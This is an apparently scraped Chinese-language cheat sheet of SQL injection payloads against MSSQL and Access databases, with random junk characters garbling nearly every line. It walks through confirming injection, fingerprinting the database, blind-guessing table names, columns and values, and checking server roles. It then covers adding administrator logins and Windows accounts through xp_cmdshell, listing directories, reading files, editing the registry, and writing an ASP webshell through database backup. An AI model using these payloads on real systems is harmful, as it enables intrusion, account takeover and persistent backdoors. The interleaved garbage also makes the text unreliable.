1.判断是否有注入;and 1=1 ;and 1=2 \pVNJ�y$`<
2.初步判断是否是mssql ;and user>0 K;*B$2Z#�k
JQDS�3v=1$
3.注入参数是字符'and [查询条件] and ''=' z-��JYzxL9
'J8Ga<�s7C
4.搜索时没过滤参数的'and [查询条件] and '%25'=' j�5!pS xOC
=y��0�h\<[
5.判断数据库系统 M.�``o�1�b
K$c?:?w�mo
;and (select count(*) from sysobjects)>0 mssql �,�:xses*7
�,�SH^L|�I
;and (select count(*) from msysobjects)>0 access ��p�9[�gG\
�!�@[@&.��
e��'2�w-^7
*T2kxN,�Ik
6.猜数据库 ;and (select Count(*) from [数据库名])>0 09�J��,!NN
���~F[JupU
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 h�VW1l&�s
�t�#2�szr+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �\kP�1��Jr
G;AJBs�>Y}
9.(1)猜字段的ascii值(access) ;�N�^4R$Q.
.#LvvAeh��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %mRn�JgV5k
�.�5�!�Q(
(2)猜字段的ascii值(mssql) `�<(o;*&Gd
#�{5h6�IC�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;^�ff35EE8
s&M#]8x;x�
10.测试权限结构(mssql) r#(*x �2~,
4[rX\��?^e
�Lkl��b���
�A�QD�`cG
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �+p�x�t�ar
�x.>&|�E�j
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ^%NjdZu�DO
[�<.dO�e7|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- z6Zd/�mt~x
P\�&n0C�~�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �>:|j�ds�#
}*c[}�VLN
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- n�e# �%�Gr
+H���E�L�^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ,'byJlw_pv
z�c���OG[-
;and 1=(select IS_MEMBER('db_owner'));-- q OV�$4[r�
V�L�C=>w\,
22���R��
,
>'v�{o{k|C
11.添加mssql和系统的帐户 "@�L|Z�6U(
p~z\&&0�U0
;exec master.dbo.sp_addlogin username;-- GRAPv|u9[�
;exec master.dbo.sp_password null,username,password;-- �]u47]L�#�
: 2A�\X' @
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �~v�KD�B$2
��/�;WFRp.
;exec master.dbo.xp_cmdshell 'net user username password $?y\�3G��X
uo3o[�H�&#
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- V�Ku|=m2vB
USV;j�%U4*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- a� 1�~�@m[
b$Q�#F�v&P
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _����_i))2
o�T��-� �Y
���J��:l%�
IYe�,�V�L�
12.(1)遍历目录 �(S8hr,%n�
�,E�H^3ODD
;create table dirs(paths varchar(100), id int) F�r�hI��[D
86��W.z6��
;insert dirs exec master.dbo.xp_dirtree 'c:\' A�>rN�.XW�
3-_`�x�9u*
;and (select top 1 paths from dirs)>0 ���,�@a�F#
�a�d`7[f�I
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =z#j9'n$@�
g3c,x �kaO
Z@�bK�YfGM
`86�})x�z{
(2)遍历目录 wj\�k��x\+
j�B�J|%K�M
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- MZ_dI�"J�,
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 d[sY]_ dj
k#�x"��'yZ
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 O7y�IFqI=/
in2�m/q?��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 D�Y��T��C2
�b�l[2VM7P
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ^F87gow%`B
G`z��=qa�j
' [%?j?2r
(�
c �+M"s
13.mssql中的存储过程 F+/�#u�g�I
4]�no#lVRJ
xp_regenumvalues 注册表根键, 子键 ��*C,1��x5
<h*$bx]9 +
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �~X,�ZZ 9H
��Ki\�J�)l
xp_regread 根键,子键,键值名 )b-KF}]d
:</�KgR0I�
;exec xp_regread y~<���_ux,
oEsqLh9a|�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 GE}>{�x=^x
Z�;cA_}��5
xp_regwrite 根键,子键, 值名, 值类型, 值 RH���"E�O4
/;�`-[���
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 -q�pe;=g&f
�.�<Jq8��J
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 U)D}J_Z�i(
�+,J!xy+~,
xp_regdeletevalue 根键,子键,值名 4x_#
�1 -�
-Hg�,:r�e2
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��O[R��
��
S~V?Qe@&Z�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Y��"E�*#1/
9��O�-*i�K
mf�\�@�vI�
G,X���UMZ
14.mssql的backup创建webshell 6��IKi�*�}
v+�
�"�9�&
use model "*N]Y�^6/A
9C|�-�|�mo
create table cmd(str image); EkEQFd� 5g
RT"JAJTi/�
insert into cmd(str) values (''); TlJ'pG 4�^
D�"X`qF6U7
backup database model to disk='c:\l.asp'; �VX�� e7�b
0y��L%Pjn6
7
'{wl,�u
9Nu:{_Yo�P
15.mssql内置函数 /0��8�6qB|
/ a�$�B�8,
;and (select @@version)>0 获得Windows的版本号 jWh}��cM�=
=p&uQ6.�i+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 1qh�SN#s{_
TTz_w�-6�8
;and (select user_name())>0 爆当前系统的连接用户 �|/;X�-+f8
xN�4�4>�3#
;and (select db_name())>0 得到当前连接的数据库 89�J7h�nJC
��F�y�A0"�
2�,G9~<t�
en29<#8T�O
16.简洁的webshell ]Yt,|�CPe2
cB}6{c$_sW
use model �7DIFJJE'�
m]/s��R3yF
create table cmd(str image); -qJO�6O��M
�}M~[8f
�]
insert into cmd(str) values (''); N6!$V7oT��
YfVZ59l4y6
backup database model to disk='g:\wwwtest\l.asp';
